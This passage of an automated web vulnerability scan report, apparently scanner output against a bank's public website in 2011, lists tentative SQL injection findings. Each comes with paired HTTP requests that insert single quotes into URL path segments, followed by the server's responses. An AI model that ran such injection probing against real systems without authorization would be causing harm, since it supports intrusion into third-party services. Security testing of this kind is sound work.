location: http://bbt.com/bbt/%27%27/careers/
p3p: CP="NON UNI CUR OTPi OUR NOR"
x-old-content-length: 137
cache-control: private
x-powered-by: ASP.NET
Content-Length: 141

<head><title>Object moved</title></head>
<body><h1>Object Moved</h1>This object may be found <a HREF="/bbt/%27%27/careers/">here</a>.</body>

1.8. http://bbt.com/bbt/careers/ [REST URL parameter 2]  previous  next

Summary

Severity:   High
Confidence:   Tentative
Host:   http://bbt.com
Path:   /bbt/careers/

Issue detail

The REST URL parameter 2 appears to be vulnerable to SQL injection attacks. A single quote was submitted in the REST URL parameter 2, and a general error message was returned. Two single quotes were then submitted and the error message disappeared. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.

Request 1

GET /bbt/careers'/ HTTP/1.1
Host: bbt.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.77 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: bbt=52f3b26952f3b2fbbaeebafb; AMWEBJCT!%2Fbbt!ASPSESSIONIDQSQSBACC=GKDLACFAGCIIPJEOLLHHNLBA; PD_STATEFUL_b57fafc4-99a4-11da-83e0-00f81800e002=%2Fbbt; op499brightbankingpromopagegum=a03s09r0h9276km0yk2fm5f45; op499brightbankingpromopageliid=a03s09r0h9276km0yk2fm5f45; opdata=state%3DOther; s_vi=[CS]v1|26FFD06E85013DB0-6000010D800A3532[CE]; s_cc=true; s_nr=1308598534372; s_sq=%5B%5BB%5D%5D

Response 1

HTTP/1.1 404 - Not Found
content-type: text/html
date: Mon, 20 Jun 2011 19:35:57 GMT
p3p: CP="NON UNI CUR OTPi OUR NOR"
x-old-content-length: 15425
cache-control: private
x-powered-by: ASP.NET
Content-Length: 15565


<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
   <meta name="DCS.dcsuri" content="/404error"/>
...[SNIP]...

Request 2

GET /bbt/careers''/ HTTP/1.1
Host: bbt.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.77 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: bbt=52f3b26952f3b2fbbaeebafb; AMWEBJCT!%2Fbbt!ASPSESSIONIDQSQSBACC=GKDLACFAGCIIPJEOLLHHNLBA; PD_STATEFUL_b57fafc4-99a4-11da-83e0-00f81800e002=%2Fbbt; op499brightbankingpromopagegum=a03s09r0h9276km0yk2fm5f45; op499brightbankingpromopageliid=a03s09r0h9276km0yk2fm5f45; opdata=state%3DOther; s_vi=[CS]v1|26FFD06E85013DB0-6000010D800A3532[CE]; s_cc=true; s_nr=1308598534372; s_sq=%5B%5BB%5D%5D

Response 2

HTTP/1.1 302 Object moved
content-type: text/html
date: Mon, 20 Jun 2011 19:35:57 GMT
location: http://bbt.com/bbt/careers%27%27/
p3p: CP="NON UNI CUR OTPi OUR NOR"
x-old-content-length: 136
cache-control: private
x-powered-by: ASP.NET
Content-Length: 140

<head><title>Object moved</title></head>
<body><h1>Object Moved</h1>This object may be found <a HREF="/bbt/careers%27%27/">here</a>.</body>

1.9. http://bbt.com/bbt/careers/panel/quotes.xml [REST URL parameter 1]  previous  next

Summary

Severity:   High
Confidence:   Tentative
Host:   http://bbt.com
Path:   /bbt/careers/panel/quotes.xml

Issue detail

The REST URL parameter 1 appears to be vulnerable to SQL injection attacks. A single quote was submitted in the REST URL parameter 1, and a general error message was returned. Two single quotes were then submitted and the error message disappeared. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.

Request 1

GET /bbt'/careers/panel/quotes.xml HTTP/1.1
Host: bbt.com
Proxy-Connection: keep-alive
Referer: http://bbt.com/bbt/careers/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.77 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: bbt=52f3b26952f3b2fbbaeebafb; AMWEBJCT!%2Fbbt!ASPSESSIONIDQSQSBACC=GKDLACFAGCIIPJEOLLHHNLBA; PD_STATEFUL_b57fafc4-99a4-11da-83e0-00f81800e002=%2Fbbt; op499brightbankingpromopagegum=a03s09r0h9276km0yk2fm5f45; op499brightbankingpromopageliid=a03s09r0h9276km0yk2fm5f45; opdata=state%3DOther; s_vi=[CS]v1|26FFD06E85013DB0-6000010D800A3532[CE]; s_cc=true; s_nr=1308598541335; s_sq=%5B%5BB%5D%5D

Response 1

HTTP/1.1 404 - Not Found
content-type: text/html
date: Mon, 20 Jun 2011 19:38:16 GMT
p3p: CP="NON UNI CUR OTPi OUR NOR"
x-old-content-length: 15425
cache-control: private
x-powered-by: ASP.NET
Content-Length: 15565


<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
   <meta name="DCS.dcsuri" content="/404error"/>
...[SNIP]...

Request 2

GET /bbt''/careers/panel/quotes.xml HTTP/1.1
Host: bbt.com
Proxy-Connection: keep-alive
Referer: http://bbt.com/bbt/careers/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.77 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: bbt=52f3b26952f3b2fbbaeebafb; AMWEBJCT!%2Fbbt!ASPSESSIONIDQSQSBACC=GKDLACFAGCIIPJEOLLHHNLBA; PD_STATEFUL_b57fafc4-99a4-11da-83e0-00f81800e002=%2Fbbt; op499brightbankingpromopagegum=a03s09r0h9276km0yk2fm5f45; op499brightbankingpromopageliid=a03s09r0h9276km0yk2fm5f45; opdata=state%3DOther; s_vi=[CS]v1|26FFD06E85013DB0-6000010D800A3532[CE]; s_cc=true; s_nr=1308598541335; s_sq=%5B%5BB%5D%5D

Response 2

HTTP/1.1 302 Object moved
content-type: text/html
date: Mon, 20 Jun 2011 19:38:16 GMT
location: http://bbt.com/bbt/%27%27/careers/panel/quotes.xml
p3p: CP="NON UNI CUR OTPi OUR NOR"
x-old-content-length: 153
cache-control: private
x-powered-by: ASP.NET
Content-Length: 157

<head><title>Object moved</title></head>
<body><h1>Object Moved</h1>This object may be found <a HREF="/bbt/%27%27/careers/panel/quotes.xml">here</a>.</body>

1.10. http://bbt.com/bbt/careers/panel/quotes.xml [REST URL parameter 2]  previous  next

Summary

Severity:   High
Confidence:   Tentative
Host:   http://bbt.com
Path:   /bbt/careers/panel/quotes.xml

Issue detail

The REST URL parameter 2 appears to be vulnerable to SQL injection attacks. A single quote was submitted in the REST URL parameter 2, and a general error message was returned. Two single quotes were then submitted and the error message disappeared. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.

Request 1

GET /bbt/careers'/panel/quotes.xml HTTP/1.1
Host: bbt.com
Proxy-Connection: keep-alive
Referer: http://bbt.com/bbt/careers/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.77 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: bbt=52f3b26952f3b2fbbaeebafb; AMWEBJCT!%2Fbbt!ASPSESSIONIDQSQSBACC=GKDLACFAGCIIPJEOLLHHNLBA; PD_STATEFUL_b57fafc4-99a4-11da-83e0-00f81800e002=%2Fbbt; op499brightbankingpromopagegum=a03s09r0h9276km0yk2fm5f45; op499brightbankingpromopageliid=a03s09r0h9276km0yk2fm5f45; opdata=state%3DOther; s_vi=[CS]v1|26FFD06E85013DB0-6000010D800A3532[CE]; s_cc=true; s_nr=1308598541335; s_sq=%5B%5BB%5D%5D

Response 1

HTTP/1.1 404 - Not Found
content-type: text/html
date: Mon, 20 Jun 2011 19:38:20 GMT
p3p: CP="NON UNI CUR OTPi OUR NOR"
x-old-content-length: 15425
cache-control: private
x-powered-by: ASP.NET
Content-Length: 15565


<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
   <meta name="DCS.dcsuri" content="/404error"/>
...[SNIP]...

Request 2

GET /bbt/careers''/panel/quotes.xml HTTP/1.1
Host: bbt.com
Proxy-Connection: keep-alive
Referer: http://bbt.com/bbt/careers/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.77 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: bbt=52f3b26952f3b2fbbaeebafb; AMWEBJCT!%2Fbbt!ASPSESSIONIDQSQSBACC=GKDLACFAGCIIPJEOLLHHNLBA; PD_STATEFUL_b57fafc4-99a4-11da-83e0-00f81800e002=%2Fbbt; op499brightbankingpromopagegum=a03s09r0h9276km0yk2fm5f45; op499brightbankingpromopageliid=a03s09r0h9276km0yk2fm5f45; opdata=state%3DOther; s_vi=[CS]v1|26FFD06E85013DB0-6000010D800A3532[CE]; s_cc=true; s_nr=1308598541335; s_sq=%5B%5BB%5D%5D

Response 2

HTTP/1.1 302 Object moved
content-type: text/html
date: Mon, 20 Jun 2011 19:38:20 GMT
location: http://bbt.com/bbt/careers%27%27/panel/quotes.xml
p3p: CP="NON UNI CUR OTPi OUR NOR"
x-old-content-length: 152
cache-control: private
x-powered-by: ASP.NET
Content-Length: 156

<head><title>Object moved</title></head>
<body><h1>Object Moved</h1>This object may be found <a HREF="/bbt/careers%27%27/panel/quotes.xml">here</a>.</body>

1.11. http://bbt.com/bbt/careers/panel/quotes.xml [REST URL parameter 3]  previous  next

Summary

Severity:   High
Confidence:   Tentative
Host:   http://bbt.com
Path:   /bbt/careers/panel/quotes.xml

Issue detail

The REST URL parameter 3 appears to be vulnerable to SQL injection attacks. A single quote was submitted in the REST URL parameter 3, and a general error message was returned. Two single quotes were then submitted and the error message disappeared. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.

Request 1

GET /bbt/careers/panel'/quotes.xml HTTP/1.1
Host: bbt.com
Proxy-Connection: keep-alive
Referer: http://bbt.com/bbt/careers/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.77 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: bbt=52f3b26952f3b2fbbaeebafb; AMWEBJCT!%2Fbbt!ASPSESSIONIDQSQSBACC=GKDLACFAGCIIPJEOLLHHNLBA; PD_STATEFUL_b57fafc4-99a4-11da-83e0-00f81800e002=%2Fbbt; op499brightbankingpromopagegum=a03s09r0h9276km0yk2fm5f45; op499brightbankingpromopageliid=a03s09r0h9276km0yk2fm5f45; opdata=state%3DOther; s_vi=[CS]v1|26FFD06E85013DB0-6000010D800A3532[CE]; s_cc=true; s_nr=1308598541335; s_sq=%5B%5BB%5D%5D

Response 1

HTTP/1.1 404 - Not Found
content-type: text/html
date: Mon, 20 Jun 2011 19:38:24 GMT
p3p: CP="NON UNI CUR OTPi OUR NOR"
x-old-content-length: 15425
cache-control: private
x-powered-by: ASP.NET
Content-Length: 15565


<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
   <meta name="DCS.dcsuri" content="/404error"/>
...[SNIP]...

Request 2

GET /bbt/careers/panel''/quotes.xml HTTP/1.1
Host: bbt.com
Proxy-Connection: keep-alive
Referer: http://bbt.com/bbt/careers/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.77 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: bbt=52f3b26952f3b2fbbaeebafb; AMWEBJCT!%2Fbbt!ASPSESSIONIDQSQSBACC=GKDLACFAGCIIPJEOLLHHNLBA; PD_STATEFUL_b57fafc4-99a4-11da-83e0-00f81800e002=%2Fbbt; op499brightbankingpromopagegum=a03s09r0h9276km0yk2fm5f45; op499brightbankingpromopageliid=a03s09r0h9276km0yk2fm5f45; opdata=state%3DOther; s_vi=[CS]v1|26FFD06E85013DB0-6000010D800A3532[CE]; s_cc=true; s_nr=1308598541335; s_sq=%5B%5BB%5D%5D

Response 2

HTTP/1.1 302 Object moved
content-type: text/html
date: Mon, 20 Jun 2011 19:38:24 GMT
location: http://bbt.com/bbt/careers/panel%27%27/quotes.xml
p3p: CP="NON UNI CUR OTPi OUR NOR"
x-old-content-length: 152
cache-control: private
x-powered-by: ASP.NET
Content-Length: 156

<head><title>Object moved</title></head>
<body><h1>Object Moved</h1>This object may be found <a HREF="/bbt/careers/panel%27%27/quotes.xml">here</a>.</body>

1.12. http://bbt.com/bbt/careers/panel/quotes.xml [REST URL parameter 4]  previous  next

Summary

Severity:   High
Confidence:   Tentative
Host:   http://bbt.com
Path:   /bbt/careers/panel/quotes.xml

Issue detail

The REST URL parameter 4 appears to be vulnerable to SQL injection attacks. A single quote was submitted in the REST URL parameter 4, and a general error message was returned. Two single quotes were then submitted and the error message disappeared. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.

Request 1

GET /bbt/careers/panel/quotes.xml' HTTP/1.1
Host: bbt.com
Proxy-Connection: keep-alive
Referer: http://bbt.com/bbt/careers/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.77 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: bbt=52f3b26952f3b2fbbaeebafb; AMWEBJCT!%2Fbbt!ASPSESSIONIDQSQSBACC=GKDLACFAGCIIPJEOLLHHNLBA; PD_STATEFUL_b57fafc4-99a4-11da-83e0-00f81800e002=%2Fbbt; op499brightbankingpromopagegum=a03s09r0h9276km0yk2fm5f45; op499brightbankingpromopageliid=a03s09r0h9276km0yk2fm5f45; opdata=state%3DOther; s_vi=[CS]v1|26FFD06E85013DB0-6000010D800A3532[CE]; s_cc=true; s_nr=1308598541335; s_sq=%5B%5BB%5D%5D

Response 1

HTTP/1.1 404 - Not Found
content-type: text/html
date: Mon, 20 Jun 2011 19:38:27 GMT
p3p: CP="NON UNI CUR OTPi OUR NOR"
x-old-content-length: 15425
cache-control: private
x-powered-by: ASP.NET
Content-Length: 15565


<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
   <meta name="DCS.dcsuri" content="/404error"/>
...[SNIP]...

Request 2

GET /bbt/careers/panel/quotes.xml'' HTTP/1.1
Host: bbt.com
Proxy-Connection: keep-alive
Referer: http://bbt.com/bbt/careers/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.77 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: bbt=52f3b26952f3b2fbbaeebafb; AMWEBJCT!%2Fbbt!ASPSESSIONIDQSQSBACC=GKDLACFAGCIIPJEOLLHHNLBA; PD_STATEFUL_b57fafc4-99a4-11da-83e0-00f81800e002=%2Fbbt; op499brightbankingpromopagegum=a03s09r0h9276km0yk2fm5f45; op499brightbankingpromopageliid=a03s09r0h9276km0yk2fm5f45; opdata=state%3DOther; s_vi=[CS]v1|26FFD06E85013DB0-6000010D800A3532[CE]; s_cc=true; s_nr=1308598541335; s_sq=%5B%5BB%5D%5D

Response 2

HTTP/1.1 302 Object moved
content-type: text/html
date: Mon, 20 Jun 2011 19:38:28 GMT
location: http://bbt.com/bbt/careers/panel/quotes.xml%27%27
p3p: CP="NON UNI CUR OTPi OUR NOR"
x-old-content-length: 152
cache-control: private
x-powered-by: ASP.NET
Content-Length: 156

<head><title>Object moved</title></head>
<body><h1>Object Moved</h1>This object may be found <a HREF="/bbt/careers/panel/quotes.xml%27%27">here</a>.</body>

1.13. http://bbt.com/bbt/contactus/personal.html [REST URL parameter 1]  previous  next

Summary

Severity:   High
Confidence:   Tentative
Host:   http://bbt.com
Path:   /bbt/contactus/personal.html

Issue detail

The REST URL parameter 1 appears to be vulnerable to SQL injection attacks. A single quote was submitted in the REST URL parameter 1, and a general error message was returned. Two single quotes were then submitted and the error message disappeared. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.

Request 1

GET /bbt'/contactus/personal.html HTTP/1.1
Host: bbt.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.77 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: bbt=52f3b26952f3b2fbbaeebafb; AMWEBJCT!%2Fbbt!ASPSESSIONIDQSQSBACC=GKDLACFAGCIIPJEOLLHHNLBA; PD_STATEFUL_b57fafc4-99a4-11da-83e0-00f81800e002=%2Fbbt; op499brightbankingpromopagegum=a03s09r0h9276km0yk2fm5f45; op499brightbankingpromopageliid=a03s09r0h9276km0yk2fm5f45; opdata=state%3DOther; s_cc=true; s_nr=1308598493694; s_sq=%5B%5BB%5D%5D; s_vi=[CS]v1|26FFD06E85013DB0-6000010D800A3532[CE]

Response 1

HTTP/1.1 404 - Not Found
content-type: text/html
date: Mon, 20 Jun 2011 19:35:55 GMT
p3p: CP="NON UNI CUR OTPi OUR NOR"
x-old-content-length: 15425
cache-control: private
x-powered-by: ASP.NET
Content-Length: 15565


<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
   <meta name="DCS.dcsuri" content="/404error"/>
...[SNIP]...

Request 2

GET /bbt''/contactus/personal.html HTTP/1.1
Host: bbt.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.77 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: bbt=52f3b26952f3b2fbbaeebafb; AMWEBJCT!%2Fbbt!ASPSESSIONIDQSQSBACC=GKDLACFAGCIIPJEOLLHHNLBA; PD_STATEFUL_b57fafc4-99a4-11da-83e0-00f81800e002=%2Fbbt; op499brightbankingpromopagegum=a03s09r0h9276km0yk2fm5f45; op499brightbankingpromopageliid=a03s09r0h9276km0yk2fm5f45; opdata=state%3DOther; s_cc=true; s_nr=1308598493694; s_sq=%5B%5BB%5D%5D; s_vi=[CS]v1|26FFD06E85013DB0-6000010D800A3532[CE]

Response 2

HTTP/1.1 302 Object moved
content-type: text/html
date: Mon, 20 Jun 2011 19:35:55 GMT
location: http://bbt.com/bbt/%27%27/contactus/personal.html
p3p: CP="NON UNI CUR OTPi OUR NOR"
x-old-content-length: 152
cache-control: private
x-powered-by: ASP.NET
Content-Length: 156

<head><title>Object moved</title></head>
<body><h1>Object Moved</h1>This object may be found <a HREF="/bbt/%27%27/contactus/personal.html">here</a>.</body>

1.14. http://bbt.com/bbt/contactus/personal.html [REST URL parameter 2]  previous  next

Summary

Severity:   High
Confidence:   Tentative
Host:   http://bbt.com
Path:   /bbt/contactus/personal.html

Issue detail

The REST URL parameter 2 appears to be vulnerable to SQL injection attacks. A single quote was submitted in the REST URL parameter 2, and a general error message was returned. Two single quotes were then submitted and the error message disappeared. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.

Request 1

GET /bbt/contactus'/personal.html HTTP/1.1
Host: bbt.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.77 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: bbt=52f3b26952f3b2fbbaeebafb; AMWEBJCT!%2Fbbt!ASPSESSIONIDQSQSBACC=GKDLACFAGCIIPJEOLLHHNLBA; PD_STATEFUL_b57fafc4-99a4-11da-83e0-00f81800e002=%2Fbbt; op499brightbankingpromopagegum=a03s09r0h9276km0yk2fm5f45; op499brightbankingpromopageliid=a03s09r0h9276km0yk2fm5f45; opdata=state%3DOther; s_cc=true; s_nr=1308598493694; s_sq=%5B%5BB%5D%5D; s_vi=[CS]v1|26FFD06E85013DB0-6000010D800A3532[CE]

Response 1

HTTP/1.1 404 - Not Found
content-type: text/html
date: Mon, 20 Jun 2011 19:36:00 GMT
p3p: CP="NON UNI CUR OTPi OUR NOR"
x-old-content-length: 15425
cache-control: private
x-powered-by: ASP.NET
Content-Length: 15565


<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
   <meta name="DCS.dcsuri" content="/404error"/>
...[SNIP]...

Request 2

GET /bbt/contactus''/personal.html HTTP/1.1
Host: bbt.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.77 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: bbt=52f3b26952f3b2fbbaeebafb; AMWEBJCT!%2Fbbt!ASPSESSIONIDQSQSBACC=GKDLACFAGCIIPJEOLLHHNLBA; PD_STATEFUL_b57fafc4-99a4-11da-83e0-00f81800e002=%2Fbbt; op499brightbankingpromopagegum=a03s09r0h9276km0yk2fm5f45; op499brightbankingpromopageliid=a03s09r0h9276km0yk2fm5f45; opdata=state%3DOther; s_cc=true; s_nr=1308598493694; s_sq=%5B%5BB%5D%5D; s_vi=[CS]v1|26FFD06E85013DB0-6000010D800A3532[CE]

Response 2

HTTP/1.1 302 Object moved
content-type: text/html
date: Mon, 20 Jun 2011 19:36:00 GMT
location: http://bbt.com/bbt/contactus%27%27/personal.html
p3p: CP="NON UNI CUR OTPi OUR NOR"
x-old-content-length: 151
cache-control: private
x-powered-by: ASP.NET
Content-Length: 155

<head><title>Object moved</title></head>
<body><h1>Object Moved</h1>This object may be found <a HREF="/bbt/contactus%27%27/personal.html">here</a>.</body>

1.15. http://bbt.com/bbt/contactus/personal.html [REST URL parameter 3]  previous  next

Summary

Severity:   High
Confidence:   Tentative
Host:   http://bbt.com
Path:   /bbt/contactus/personal.html

Issue detail

The REST URL parameter 3 appears to be vulnerable to SQL injection attacks. A single quote was submitted in the REST URL parameter 3, and a general error message was returned. Two single quotes were then submitted and the error message disappeared. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.

Request 1

GET /bbt/contactus/personal.html' HTTP/1.1
Host: bbt.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.77 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: bbt=52f3b26952f3b2fbbaeebafb; AMWEBJCT!%2Fbbt!ASPSESSIONIDQSQSBACC=GKDLACFAGCIIPJEOLLHHNLBA; PD_STATEFUL_b57fafc4-99a4-11da-83e0-00f81800e002=%2Fbbt; op499brightbankingpromopagegum=a03s09r0h9276km0yk2fm5f45; op499brightbankingpromopageliid=a03s09r0h9276km0yk2fm5f45; opdata=state%3DOther; s_cc=true; s_nr=1308598493694; s_sq=%5B%5BB%5D%5D; s_vi=[CS]v1|26FFD06E85013DB0-6000010D800A3532[CE]

Response 1

HTTP/1.1 404 - Not Found
content-type: text/html
date: Mon, 20 Jun 2011 19:36:05 GMT
p3p: CP="NON UNI CUR OTPi OUR NOR"
x-old-content-length: 15425
cache-control: private
x-powered-by: ASP.NET
Content-Length: 15565


<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
   <meta name="DCS.dcsuri" content="/404error"/>
...[SNIP]...

Request 2

GET /bbt/contactus/personal.html'' HTTP/1.1
Host: bbt.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.77 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: bbt=52f3b26952f3b2fbbaeebafb; AMWEBJCT!%2Fbbt!ASPSESSIONIDQSQSBACC=GKDLACFAGCIIPJEOLLHHNLBA; PD_STATEFUL_b57fafc4-99a4-11da-83e0-00f81800e002=%2Fbbt; op499brightbankingpromopagegum=a03s09r0h9276km0yk2fm5f45; op499brightbankingpromopageliid=a03s09r0h9276km0yk2fm5f45; opdata=state%3DOther; s_cc=true; s_nr=1308598493694; s_sq=%5B%5BB%5D%5D; s_vi=[CS]v1|26FFD06E85013DB0-6000010D800A3532[CE]

Response 2

HTTP/1.1 302 Object moved
content-type: text/html
date: Mon, 20 Jun 2011 19:36:05 GMT
location: http://bbt.com/bbt/contactus/personal.html%27%27
p3p: CP="NON UNI CUR OTPi OUR NOR"
x-old-content-length: 151
cache-control: private
x-powered-by: ASP.NET
Content-Length: 155

<head><title>Object moved</title></head>
<body><h1>Object Moved</h1>This object may be found <a HREF="/bbt/contactus/personal.html%27%27">here</a>.</body>

1.16. http://bbt.com/bbt/online-banking/enter-password.html [REST URL parameter 1]  previous  next

Summary

Severity:   High
Confidence:   Tentative
Host:   http://bbt.com
Path:   /bbt/online-banking/enter-password.html

Issue detail

The REST URL parameter 1 appears to be vulnerable to SQL injection attacks. A single quote was submitted in the REST URL parameter 1, and a general error message was returned. Two single quotes were then submitted and the error message disappeared. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.

Request 1

GET /bbt'/online-banking/enter-password.html HTTP/1.1
Host: bbt.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.77 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
